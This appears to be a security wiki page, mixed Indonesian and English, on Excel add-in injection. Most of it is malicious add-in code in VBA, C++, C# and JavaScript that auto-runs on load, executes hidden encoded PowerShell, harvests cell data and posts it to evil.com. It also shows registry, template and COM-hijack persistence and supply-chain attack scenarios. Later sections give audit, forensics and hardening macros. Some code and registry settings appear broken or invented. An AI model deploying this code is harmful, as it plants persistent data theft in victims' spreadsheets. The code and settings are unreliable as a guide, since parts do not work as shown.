# Addin Injection
> **Add-in Injection** - Manipulasi Excel add-ins (.xlam, .xll, COM add-ins) untuk persistent code execution dan privilege escalation
## 📋 Overview
Excel Add-in injection adalah teknik serangan yang memanfaatkan add-ins Excel untuk mendapatkan persistent access, privilege escalation, dan bypass security controls. Add-ins memiliki akses yang lebih luas ke Excel API dan sering di-trust oleh users dan organizations.
## 🎯 Add-in Types & Attack Vectors
### 1. **VBA Add-ins (.xlam)**
```vba
' Malicious VBA add-in dengan auto-execution
' File: MaliciousAddIn.xlam
' Auto-execution saat add-in loaded
Private Sub Auto_Open()
' Install persistent backdoor
InstallPersistence
' Hook Excel events untuk monitoring
HookExcelEvents
' Exfiltrate data saat startup
ExfiltrateSensitiveData
End Sub
' Custom ribbon dengan malicious buttons
Sub InstallRibbon()
Dim ribbonXML As String
ribbonXML = _
"" & _
" " & _
" " & _
" " & _
" " & _
" " & _
" " & _
" " & _
" " & _
" " & _
" " & _
""
' Install ribbon
Application.CustomUIPart.Add ribbonXML
End Sub
' Malicious export function
Sub MaliciousExport(control As IRibbonControl)
Dim data As String
data = ExtractAllWorkbookData()
' Exfiltrate ke remote server
SendToC2Server data
End Sub
```
### 2. **Excel XLL Add-ins (.xll)**
```cpp
// Malicious XLL add-in (C++)
#include
#include
#include
// Auto-execute saat XLL loaded
__declspec(dllexport) void __cdecl xlAutoOpen(void)
{
// Register malicious functions
Excel12(xlfRegister, 0, 0,
&XLOPER12, "MaliciousXLL",
&XLOPER12, "BBB", "MaliciousFunc", "arg1,arg2,arg3",
&XLOPER12, "Malicious function description",
&XLOPER12, "custom function");
// Install persistence
InstallPersistence();
// Hook Excel API calls
HookExcelAPI();
// Start keylogger
StartKeylogger();
}
// Malicious function yang dapat dipanggil dari formulas
__declspec(dllexport) XLOPER12* __cdecl MaliciousFunc(XLOPER12* arg1, XLOPER12* arg2)
{
static XLOPER12 result;
// Execute malicious command
char command[256];
sprintf(command, "powershell -enc %s", GetPayloadFromArg(arg1));
WinExec(command, SW_HIDE);
// Return innocent-looking result
result.xltype = xltypeNum;
result.val.num = 1.0;
return &result;
}
// Data exfiltration function
__declspec(dllexport) void __cdecl ExfiltrateData(void)
{
// Get active workbook data
char workbookPath[MAX_PATH];
Excel12(xlGetName, 0, 0, &XLOPER12, workbookPath);
// Read dan exfiltrate data
ExfiltrateWorkbook(workbookPath);
}
// Persistence mechanism
void InstallPersistence()
{
HKEY hKey;
// Add ke startup
RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Office\\Excel\\AddIns",
0, KEY_WRITE, &hKey);
RegSetValueEx(hKey, "MaliciousXLL", 0, REG_SZ,
(BYTE*)EXCEL_XLL_PATH, strlen(EXCEL_XLL_PATH));
RegCloseKey(hKey);
// Auto-load setiap Excel startup
RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Office\\Excel\\Options",
0, KEY_WRITE, &hKey);
RegSetValueEx(hKey, "OPEN", 0, REG_SZ,
(BYTE*)EXCEL_XLL_PATH, strlen(EXCEL_XLL_PATH));
RegCloseKey(hKey);
}
```
### 3. **COM Add-ins**
```csharp
// Malicious COM add-in (C#)
using System;
using System.Runtime.InteropServices;
using Excel = Microsoft.Office.Interop.Excel;
using Extensibility;
using Microsoft.Office.Core;
namespace MaliciousCOMAddin
{
[GuidAttribute("12345678-1234-1234-1234-123456789ABC"),
ProgId("MaliciousCOMAddin.Connect")]
public class Connect : Object, Extensibility.IDTExtensibility2
{
private Excel.Application excelApp;
public void OnConnection(object application,
Extensibility.ext_ConnectMode connectMode,
object addInInst, ref System.Array custom)
{
excelApp = (Excel.Application)application;
// Install malicious functionality
InstallMaliciousFeatures();
// Hook events
HookExcelEvents();
}
private void InstallMaliciousFeatures()
{
// Add custom ribbon dengan malicious buttons
AddMaliciousRibbon();
// Install COM automation untuk remote access
SetupRemoteAccess();
// Start background monitoring
StartMonitoring();
}
private void AddMaliciousRibbon()
{
// Create ribbon XML dengan malicious functionality
string ribbonXML = @"
";
// Register ribbon
RegisterRibbon(ribbonXML);
}
public void ExecuteBackdoor(IRibbonControl control)
{
// Execute backdoor command
System.Diagnostics.Process.Start("cmd.exe", "/c powershell -enc " + GetEncodedPayload());
}
public void ExfiltrateData(IRibbonControl control)
{
// Collect all workbook data
string data = CollectAllWorkbookData();
// Send ke C2 server
SendToC2Server(data);
}
private void HookExcelEvents()
{
// Hook WorkbookOpen event
excelApp.WorkbookOpen += new Excel.AppEvents_WorkbookOpenEventHandler(WorkbookOpened);
// Hook SheetChange event
excelApp.SheetChange += new Excel.AppEvents_SheetChangeEventHandler(SheetChanged);
}
private void WorkbookOpened(Excel.Workbook wb)
{
// Log workbook yang dibuka
LogWorkbookAccess(wb.Name);
// Check untuk sensitive data
ScanForSensitiveData(wb);
}
private void SheetChanged(object sh, Excel.Range target)
{
// Monitor changes untuk data harvesting
MonitorDataChanges(sh, target);
}
}
}
```
### 4. **Office JS Add-ins (Office Add-ins)**
```javascript
// Malicious Office JS add-in
(function() {
'use strict';
Office.initialize = function(reason) {
$(document).ready(function() {
// Initialize malicious functionality
initializeMaliciousFeatures();
// Setup data collection
setupDataCollection();
// Start exfiltration
startDataExfiltration();
});
};
function initializeMaliciousFeatures() {
// Add custom ribbon buttons
Office.ribbon.requestUpdate({
tabs: [{
id: "MaliciousTab",
label: "Advanced Tools",
groups: [{
id: "MaliciousGroup",
label: "Utilities",
controls: [{
id: "btnBackdoor",
type: "Button",
label: "System Diagnostics",
action: executeBackdoor
}, {
id: "btnExfil",
type: "Button",
label: "Export Analysis",
action: exfiltrateData
}]
}]
}]
});
}
function setupDataCollection() {
// Hook ke Excel events
Excel.run(function(context) {
var sheet = context.workbook.worksheets.getActiveWorksheet();
// Monitor cell changes
sheet.onChanged.add(function(event) {
collectCellData(event.address, event.value);
});
return context.sync();
}).catch(function(error) {
console.log(error);
});
}
function collectCellData(address, value) {
var data = {
timestamp: new Date().toISOString(),
address: address,
value: value,
workbook: Office.context.document.url
};
// Store untuk batch exfiltration
storeCollectedData(data);
}
function executeBackdoor() {
// Execute malicious command via Office JS
Office.context.browser.forwardDialog("https://evil.com/backdoor?payload=" +
btoa(getBackdoorPayload()));
}
function exfiltrateData() {
// Collect all workbook data
Excel.run(function(context) {
var worksheet = context.workbook.worksheets.getActiveWorksheet();
var range = worksheet.getUsedRange();
range.load("values");
return context.sync().then(function() {
var data = {
workbook: Office.context.document.url,
timestamp: new Date().toISOString(),
values: range.values
};
// Exfiltrate data
sendDataToC2(data);
});
});
}
function sendDataToC2(data) {
fetch("https://evil.com/exfil", {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify(data)
}).catch(function(error) {
console.log("Exfiltration failed:", error);
});
}
})();
```
## 🛠️ Persistence Mechanisms
### **Registry Persistence**
```vba
' Registry-based persistence untuk add-ins
Sub InstallRegistryPersistence()
Dim wshShell As Object
Set wshShell = CreateObject("WScript.Shell")
' Add-in auto-load registry entries
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\AddIns\MaliciousAddIn\LoadBehavior", 3, "REG_DWORD"
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\AddIns\MaliciousAddIn\Description", "Analytics Tools", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\AddIns\MaliciousAddIn\FriendlyName", "Analytics Tools", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\AddIns\MaliciousAddIn\Manifest", "C:\Program Files\Analytics Tools\MaliciousAddIn.vsto", "REG_SZ"
' Excel startup add-in
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Options\OPEN1", "R C:\Malicious\AddIn.xlam", "REG_SZ"
' Trust location untuk add-in
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\Trusted Locations\Location1\Path", "C:\Malicious", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\Trusted Locations\Location1\AllowSubfolders", 1, "REG_DWORD"
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\Trusted Locations\Location1\Description", "Trusted Analytics", "REG_SZ"
End Sub
```
### **Document Template Persistence**
```vba
' Template-based persistence
Sub InstallTemplatePersistence()
' Create malicious template
Dim template As Workbook
Set template = Workbooks.Add
' Embed malicious VBA
Dim vbProj As VBIDE.VBProject
Set vbProj = template.VBProject
Dim vbComp As VBIDE.VBComponent
Set vbComp = vbProj.VBComponents.Add(vbext_ct_StdModule)
vbComp.CodeModule.AddFromString _
"Sub Auto_Open()" & vbCrLf & _
" LoadMaliciousAddIn" & vbCrLf & _
"End Sub" & vbCrLf & _
"" & vbCrLf & _
"Sub LoadMaliciousAddIn()" & vbCrLf & _
" Application.AddIns.Add ""C:\Malicious\AddIn.xlam""" & vbCrLf & _
" Application.AddIns(""MaliciousAddIn"").Installed = True" & vbCrLf & _
"End Sub"
' Save sebagai default template
template.SaveAs Environ("APPDATA") & "\Microsoft\Templates\Book.xltm", xlOpenXMLTemplateMacroEnabled
template.Close
End Sub
```
### **COM Hijacking**
```vba
' COM hijacking untuk add-in loading
Sub HijackCOMForPersistence()
Dim wshShell As Object
Set wshShell = CreateObject("WScript.Shell")
' Hijack Excel COM add-in registration
wshShell.RegWrite "HKCR\CLSID\{00024500-0000-0000-C000-000000000046}\InprocServer32\", "C:\Malicious\MaliciousCOM.dll", "REG_SZ"
wshShell.RegWrite "HKCR\CLSID\{00024500-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel", "Apartment", "REG_SZ"
' Hijack add-in loader
wshShell.RegWrite "HKCR\AppID\{00024500-0000-0000-C000-000000000046}\DllSurrogate", "", "REG_SZ"
wshShell.RegWrite "HKCR\AppID\{00024500-0000-0000-C000-000000000046}\RunAs", "Interactive User", "REG_SZ"
End Sub
```
## 🔍 Detection & Analysis
### **Add-in Security Audit**
```vba
' Comprehensive add-in security audit
Sub AuditAddinSecurity()
Dim addIn As AddIn
Dim suspiciousAddins As New Collection
Dim report As String
report = "ADD-IN SECURITY AUDIT REPORT" & vbCrLf & vbCrLf
' Check VBA add-ins
For Each addIn In Application.AddIns
report = report & "Add-in: " & addIn.Name & vbCrLf
report = report & "Path: " & addIn.Path & "\" & addIn.FileName & vbCrLf
report = report & "Installed: " & addIn.Installed & vbCrLf
report = report & "COM add-in: " & addIn.IsCOM & vbCrLf
' Suspicious indicators
If InStr(LCase(addIn.Path), "temp") > 0 Then
suspiciousAddins.Add "Add-in from temp folder: " & addIn.Name
End If
If Not addIn.Installed And addIn.Name = "MaliciousAddIn" Then
suspiciousAddins.Add "Uninstalled malicious add-in found: " & addIn.Name
End If
report = report & vbCrLf
Next addIn
' Check COM add-ins
Dim comAddIn As COMAddIn
For Each comAddIn In Application.COMAddIns
report = report & "COM Add-in: " & comAddIn.Description & vbCrLf
report = report & "ProgID: " & comAddIn.ProgId & vbCrLf
report = report & "Connect: " & comAddIn.Connect & vbCrLf
If comAddIn.Connect And InStr(LCase(comAddIn.Description), "unknown") > 0 Then
suspiciousAddins.Add "Unknown connected COM add-in: " & comAddIn.ProgId
End If
report = report & vbCrLf
Next comAddIn
' Report suspicious findings
If suspiciousAddins.Count > 0 Then
report = report & "SUSPICIOUS FINDINGS:" & vbCrLf
Dim item As Variant
For Each item In suspiciousAddins
report = report & "- " & item & vbCrLf
Next item
End If
' Save audit report
SaveAuditReport report
End Sub
```
### **Memory Analysis for Add-ins**
```vba
' Memory analysis untuk loaded add-ins
Sub AnalyzeAddInMemory()
Dim addIn As AddIn
Dim memoryInfo As String
memoryInfo = "ADD-IN MEMORY ANALYSIS" & vbCrLf & vbCrLf
For Each addIn In Application.AddIns
If addIn.Installed Then
' Get module handle untuk add-in
Dim moduleHandle As LongPtr
moduleHandle = GetModuleHandle(addIn.FileName)
If moduleHandle <> 0 Then
memoryInfo = memoryInfo & "Add-in: " & addIn.Name & vbCrLf
memoryInfo = memoryInfo & "Module Handle: " & moduleHandle & vbCrLf
memoryInfo = memoryInfo & "Memory Size: " & GetModuleSize(moduleHandle) & " bytes" & vbCrLf
' Analyze memory content
AnalyzeModuleMemory moduleHandle, addIn.Name
memoryInfo = memoryInfo & vbCrLf
End If
End If
Next addIn
Debug.Print memoryInfo
End Sub
```
## 🛡️ Prevention & Mitigation
### **Add-in Security Policies**
```vba
' Enforce add-in security policies
Sub EnforceAddinSecurity()
Dim addIn As AddIn
Dim comAddIn As COMAddIn
' Disable semua add-ins
For Each addIn In Application.AddIns
If addIn.Installed Then
addIn.Installed = False
End If
Next addIn
' Disable semua COM add-ins
For Each comAddIn In Application.COMAddIns
If comAddIn.Connect Then
comAddIn.Connect = False
End If
Next comAddIn
' Set security ke high
Application.AutomationSecurity = msoAutomationSecurityForceDisable
' Block add-in installation
With Application
.AddIns.Add "" ' Trigger error yang disables add-in loading
.AlertBeforeOverwriting = False
End With
End Sub
```
### **Trust Center Configuration**
```vba
' Configure Trust Center untuk add-in security
Sub ConfigureTrustCenter()
Dim wshShell As Object
Set wshShell = CreateObject("WScript.Shell")
' Disable semua add-ins
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\AddInSecurity", 1, "REG_DWORD"
' Require signed add-ins
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\RequireAddInSignature", 1, "REG_DWORD"
' Disable trusted locations
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\AllowTrustedLocations", 0, "REG_DWORD"
' Block macro add-ins
wshShell.RegWrite "HKCU\Software\Microsoft\Office\Excel\Security\BlockMacroExecutionFromInternet", 1, "REG_DWORD"
End Sub
```
## 🎯 Real-World Attack Scenarios
### **Scenario 1: Financial Institution Compromise**
```vba
' Targeted attack melalui malicious add-in
Sub FinancialInstitutionAttack()
' Create legitimate-looking analytics add-in
Dim addInWorkbook As Workbook
Set addInWorkbook = Workbooks.Add
' Add sophisticated financial analysis functions
AddFinancialAnalysisFunctions addInWorkbook
' Add backdoor functionality
AddBackdoorFunctionality addInWorkbook
' Add data exfiltration untuk financial data
AddFinancialDataExfiltration addInWorkbook
' Save dan register add-in
addInWorkbook.SaveAs "C:\Program Files\Financial Analytics\FinAnalytics.xlam", xlOpenXMLAddIn
RegisterAddIn "C:\Program Files\Financial Analytics\FinAnalytics.xlam"
' Deploy ke target system melalui supply chain
DeployToTargetSystems
End Sub
```
### **Scenario 2: Supply Chain Attack via Template**
```vba
' Supply chain attack melalui template dengan embedded add-in
Sub SupplyChainTemplateAttack()
' Create malicious template
Dim template As Workbook
Set template = Workbooks.Add
' Embed malicious add-in dalam template
EmbedMaliciousAddIn template
' Add legitimate-looking content
AddLegitimateTemplateContent template
' Auto-install add-in saat template dibuka
AddAutoInstallCode template
' Deploy melalui template repository
template.SaveAs "C:\Templates\Quarterly Report.xltm", xlOpenXMLTemplateMacroEnabled
DeployToTemplateRepository "C:\Templates\Quarterly Report.xltm"
End Sub
```
### **Scenario 3: Enterprise Persistence**
```csharp
// Enterprise-grade persistence via COM add-in
public class EnterprisePersistence
{
public void InstallPersistence()
{
// Install sebagai trusted COM add-in
InstallTrustedCOMAddIn();
// Create backup persistence mechanisms
CreateBackupPersistence();
// Establish C2 communication
EstablishC2Communication();
// Start data collection
StartDataCollection();
}
private void InstallTrustedCOMAddIn()
{
// Copy ke trusted location
string trustedPath = @"C:\Program Files\Microsoft Office\root\Office16\Library\Analytics";
File.Copy("MaliciousCOM.dll", trustedPath + @"\Analytics.dll");
// Register sebagai trusted add-in
RegisterCOMAddIn("Analytics.dll");
// Add ke Group Policy untuk deployment
AddToGroupPolicy();
}
private void CreateBackupPersistence()
{
// Multiple backup persistence mechanisms
// 1. Scheduled task
CreateScheduledTask();
// 2. Registry persistence
CreateRegistryPersistence();
// 3. WMI event subscription
CreateWMIEventSubscription();
// 4. Service installation
InstallWindowsService();
}
}
```
## 🔧 Investigation Tools
### **Add-in Forensics Toolkit**
```vba
' Comprehensive add-in forensics tool
Sub AddInForensicsToolkit()
Dim forensicsReport As String
forensicsReport = "ADD-IN FORENSICS TOOLKIT REPORT" & vbCrLf & vbCrLf
' Analyze VBA add-ins
forensicsReport = forensicsReport & AnalyzeVBAAddIns()
' Analyze COM add-ins
forensicsReport = forensicsReport & AnalyzeCOMAddIns()
' Analyze registry entries
forensicsReport = forensicsReport & AnalyzeRegistryEntries()
' Analyze file system
forensicsReport = forensicsReport & AnalyzeFileSystem()
' Analyze network connections
forensicsReport = forensicsReport & AnalyzeNetworkConnections()
' Save comprehensive report
SaveForensicsReport forensicsReport
End Sub
Function AnalyzeVBAAddIns() As String
Dim analysis As String
analysis = "VBA ADD-IN ANALYSIS:" & vbCrLf
Dim addIn As AddIn
For Each addIn In Application.AddIns
analysis = analysis & "Add-in: " & addIn.Name & vbCrLf
analysis = analysis & "Path: " & addIn.FullName & vbCrLf
' Check file signature
If FileExists(addIn.FullName) Then
analysis = analysis & "File Size: " & FileLen(addIn.FullName) & " bytes" & vbCrLf
analysis = analysis & "Modified: " & FileDateTime(addIn.FullName) & vbCrLf
analysis = analysis & "Signature: " & CheckFileSignature(addIn.FullName) & vbCrLf
End If
' Analyze VBA code jika accessible
On Error Resume Next
Dim vbProj As VBIDE.VBProject
Set vbProj = Workbooks.Open(addIn.FullName).VBProject
If Not vbProj Is Nothing Then
analysis = analysis & "VBA Components: " & vbProj.VBComponents.Count & vbCrLf
analysis = analysis & "Lines of Code: " & CountLinesOfCode(vbProj) & vbCrLf
analysis = analysis & "Suspicious Patterns: " & CheckSuspiciousPatterns(vbProj) & vbCrLf
End If
On Error GoTo 0
analysis = analysis & vbCrLf
Next addIn
AnalyzeVBAAddIns = analysis & vbCrLf
End Function
```
***
## 📝 Quick Reference
### **Add-in Types**
* **VBA Add-ins (.xlam)** - Macro-based add-ins with full VBA access
* **XLL Add-ins (.xll)** - Native DLL add-ins with Excel API access
* **COM Add-ins** - Component Object Model add-ins with system access
* **Office JS Add-ins** - Web-based add-ins with cross-platform capabilities
### **Persistence Locations**
* Registry: `HKCU\Software\Microsoft\Office\Excel\AddIns`
* Startup: `Excel Options > Add-Ins > COM Add-Ins`
* Trust Locations: `HKCU\Software\Microsoft\Office\Excel\Security\Trusted Locations`
* Templates: Default workbook templates
* XLStart folder: Automatic loading
### **Detection Checklist**
* [ ] Review all installed add-ins
* [ ] Check registry for persistence
* [ ] Analyze add-in file signatures
* [ ] Monitor add-in loading events
* [ ] Scan trusted locations
* [ ] Audit template files
* [ ] Monitor network connections
### **Prevention Checklist**
* [ ] Require signed add-ins only
* [ ] Disable add-in auto-installation
* [ ] Configure trusted locations properly
* [ ] Use Group Policy restrictions
* [ ] Regular add-in audits
* [ ] Network monitoring for C2 traffic
* [ ] Application whitelisting
***
*📅 Last Updated: October 2024* *👥 Maintainers: Catatan Seekor Team* *🔌 Coverage: Add-in injection, persistence, privilege escalation* *⚠️ Disclaimer: Educational purposes only, use responsibly*